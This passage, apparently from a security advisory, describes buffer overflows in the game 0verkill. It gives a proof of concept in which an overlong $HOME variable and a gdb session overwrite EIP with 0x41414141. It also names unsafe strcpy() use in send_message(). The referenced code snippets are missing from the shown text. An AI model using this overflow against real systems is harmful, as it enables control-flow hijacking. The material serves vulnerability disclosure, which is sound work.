Compiling 0verkill on a platform other than Windows and setting a long $HOME environment variable demonstrates the buffer overflow, like so:
$ export HOME=`perl - e 'print "A"x300'`
$ gdb ./0verkill
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License,
and you are
welcome to change it and/or distribute copies of it under
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty"
This GDB was configured as "i386-slackware-linux"...
Starting program: /root/root/all/gry/0verkill/./0verkill
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ()
(gdb) i r eip
eip 0x41414141 0x41414141
Technically the same type of bug is present in both functions. Improper bounds checking when reading the $HOME environment variable. The third possible vulnerability is in the send_message() function which is called from play():
By using the strcpy() function in such an unsafe manner it is possible to create a buffer overflow condition. With GetLastErrorText() it might be possible to create a buffer overflow condition but the author was unable to exploit it.